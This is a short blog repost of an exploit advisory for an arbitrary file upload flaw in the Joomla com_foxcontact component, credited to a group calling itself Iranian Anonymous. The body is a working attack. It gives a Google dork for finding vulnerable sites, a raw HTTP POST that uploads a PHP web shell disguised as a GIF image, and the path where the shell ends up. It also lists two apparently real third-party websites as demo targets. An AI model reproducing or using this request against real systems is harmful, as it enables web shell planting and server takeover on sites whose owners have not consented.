IT博客汇 | [EXP]Joomla Component com

[EXP]Joomla Component com_foxcontact GetShell

K8拉登哥哥发表于 2016-05-20 11:24:04
##########################
# Exploit Title: Joomla Component  Arbitrary File Upload  shell  Vulnerability
# Dork Google: allinurl:index.php?option=com_foxcontact
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# vendor Home:  http://www.fox.ra.it/
# Version: 1.0
# Tested on : Linux-Windows7
##########################

# Exploit

-HTTP Header Example-
POST http://www.cavedegruissan.com/particulars/components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php HTTP/1.1
Host: www.cavedegruissan.com
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: shell.php
Content-Type: image/jpeg
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

GIF89a<?php shell ?>

############################

Shell path:

www.site.com/components/com_foxcontact/uploads/filename.php

###########################

Demo :

http://www.cavedegruissan.com/component/hikashop/FT/index.php?option=com_foxcontact&view=foxcontact&Itemid=131

http://www.nebulaagencies.com.au/index.php?option=com_foxcontact&view=foxcontact&Itemid=113


##############################

#Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd [email protected] ||

MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier ||

And All Of Iranian Anonymous .

# Discovered By: Hacker Khan